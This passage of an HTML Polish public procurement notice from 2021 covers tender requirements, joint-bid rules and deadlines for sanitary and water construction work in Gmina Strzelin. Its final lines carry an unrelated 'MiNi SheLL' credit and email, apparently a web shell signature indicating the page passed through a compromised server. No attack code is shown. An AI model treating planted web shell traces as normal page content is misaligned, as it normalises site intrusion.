dowodowe. 3.Zamawiający wzywa wykonawcę, którego oferta została najwyżej<br/>oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania,<br/>podmiotowych środków dowodowych, aktualnych na ich dzień złożenia. 4. Podmiotowe środki<br/>dowodowe wymagane od wykonawcy obejmują: 1) Oświadczenie wykonawcy, w zakresie art.108 ust.<br/>1pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16<br/>lutego 2007 r. o ochronie konkurencji i konsumentów (Dz.U. z 2020 r. poz. 1076 i 1086), z innym<br/>wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w<br/>postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o<br/>dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej<br/>grupy kapitałowej – zgodnie z załącznikiem nr 7 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień<br/>składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu - zgodnie z załącznikiem<br/>nr 2 do SWZ; 2.Oświadczenia, o którym mowa w pkt 1, potwierdzające spełnianie warunków udziału w<br/>postępowaniu na dzień składania ofert, tymczasowo zastępują wymagane przez Zamawiającego<br/>podmiotowe środki dowodowe. 3. Zamawiający wzywa wykonawcę, którego oferta została najwyżej<br/>oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania,<br/>podmiotowych środków dowodowych, aktualnych na ich dzień złożenia. 4. Podmiotowe środki<br/>dowodowe wymagane od wykonawcy obejmują: 1) wykaz robót budowlanych wykonanych nie<br/>wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym<br/>okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz<br/>których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty<br/>budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź<br/>inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a<br/>jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne<br/>odpowiednie dokumenty- zgodnie z załącznikiem nr 5 do SWZ. W przypadku składania oferty wspólnej<br/>wykonawcy składający ofertę wspólną składają jedno wspólne w/w oświadczenie. 2) wykaz osób,<br/>skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności<br/>odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z<br/>informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia<br/>niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez<br/>nieczynności oraz informacją o podstawie do dysponowania tymi osobami – zgodnie z załącznikiem nr<br/>6 do SWZ. W przypadku składania oferty wspólnej wykonawcy składający ofertę wspólną składają<br/>jedno wspólne w/w oświadczenie.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Poza podmiotowymi środkami dowodowymi na potwierdzenie braku podstaw wykluczeniu z<br/>postępowania i potwierdzenia spełniania warunków udziału w postępowaniu Wykonawca<br/>zobowiązany jest do złożenia wraz z ofertą: a) tabelę zbiorczą ceny ryczałtowej –zgodnie z<br/>załącznikiem nr 1A do SWZ; b) pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę<br/>składa pełnomocnik; c) pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia - dotyczy ofert składanych<br/>przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (jeżeli dotyczy);<br/>d)zobowiązanie podmiotu udostępniającego zasoby Wykonawcy zgodnie z załącznikiem nr 10<br/>do SWZ (jeżeli dotyczy); e) oświadczenie podmiotu udostępniającego zasoby, potwierdzające<br/>brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnienie warunków udziału w<br/>postępowaniu – zgodnie z załącznikiem nr 4do SWZ (jeżeli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy składający ofertę wspólną ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia<br/>umowy. Do oferty wspólnej Wykonawcy dołączają pełnomocnictwo. 2.Pełnomocnik pozostaje w<br/>kontakcie z Zamawiającym w toku postępowania i do niego Zamawiający kieruje<br/>informacje,korespondencję, itp. 3. Oferta wspólna, składana przez dwóch lub więcej<br/>Wykonawców, powinna spełniać następujące wymagania: a) oferta wspólna powinna być<br/>sporządzona zgodnie z SWZ, b) sposób składania dokumentów w ofercie wspólnej:- dokumenty,<br/>dotyczące własnej firmy, takie jak np.: oświadczenie o braku podstaw do wykluczenia składa<br/>każdy z Wykonawców składających ofertę wspólną we własnym imieniu; -dokumenty wspólne<br/>takie jak np.: formularz ofertowy, dokumenty podmiotowe i przedmiotowe składa pełnomocnik<br/>Wykonawców w imieniu wszystkich Wykonawców składających ofertę wspólną. 4. Przed<br/>podpisaniem umowy (w przypadku wygrania postępowania) Wykonawcy składający ofertę<br/>wspólną będą mieli obowiązek przedstawić Zamawiającemu umowę konsorcjum,zawierającą, co<br/>najmniej: a) zobowiązanie do realizacji wspólnego przedsięwzięcia gospodarczego<br/>obejmującego swoim zakresem realizację przedmiotu zamówienia, b) określenie zakresu<br/>działania poszczególnych stron umowy, c) czas obowiązywania umowy, który nie może być<br/>krótszy, niż okres obejmujący realizację zamówienia oraz czas trwania gwarancji jakości i<br/>rękojmi. 5. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>warunki udziału w postępowaniu określone w pkt 20.2. SWZ powinni spełniać łącznie wszyscy<br/>Wykonawcy, z zastrzeżeniem, iż warunek określony w pkt 20.2.4 ppkt 1) SWZ winien spełniać<br/>co najmniej jeden z tych Wykonawców. 6. W odniesieniu do warunków dotyczących<br/>wykształcenia,kwalifikacji zawodowych lub doświadczenia, wykonawcy wspólnie ubiegających<br/>się o udzielenie zamówienia mogą polegać na zdolnościach tych Wykonawców, którzy wykonają<br/>roboty budowlane, do realizacji których te zdolności są wymagane. W przypadku, o którym<br/>mowa w pkt 20.2.4 SWZ, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia w<br/>formularzu ofertowym stanowiącym załącznik nr 1 do SWZ składają oświadczenie na podstawie<br/>art. 117 ust.4 dotyczące robót budowlanych, które wykonają poszczególni Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj, zakres zmian oraz warunki ich wprowadzenia określono w projektowanych<br/>postanowieniach umowy stanowiących załącznik nr 8 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-20 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć na Platformie pod adresem: https://gminastrzelin.ezamawiajacy.pl w zakładce „OFERTY"</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-20 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-18</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający na podstawie art. 95 ustawy Prawo zamówień publicznych wymaga zatrudnienia<br/>przez Wykonawcę lub podwykonawcę na podstawie umowy o pracę osób wykonujących<br/>czynności w zakresie realizacji zamówienia, jeżeli wykonanie tych czynności polega na<br/>wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. Kodeks<br/>pracy (t.j. Dz. U. z 2020 r. poz. 1320).2. Zamawiający wymaga zatrudnienia na podstawie<br/>umowy o pracę przez Wykonawcę lub Podwykonawcę osób wykonujących wskazane poniżej<br/>czynności w trakcie realizacji zamówienia: a) czynności związane z obsługą ciężkiego sprzętu budowlanego, tj. m.in.: koparka, ładowarka, koparko-ładowarka; <br/>b) czynności związane z montażem budynku sanitariatów – kontenerowego; <br/>c) czynności związane z wykonaniem instalacji zewnętrznej wody;<br/>d)czynności związane z wykonaniem kanalizacji sanitarnej wraz ze zbiornikiem bezodpływowym na nieczystości płynne.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-05 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com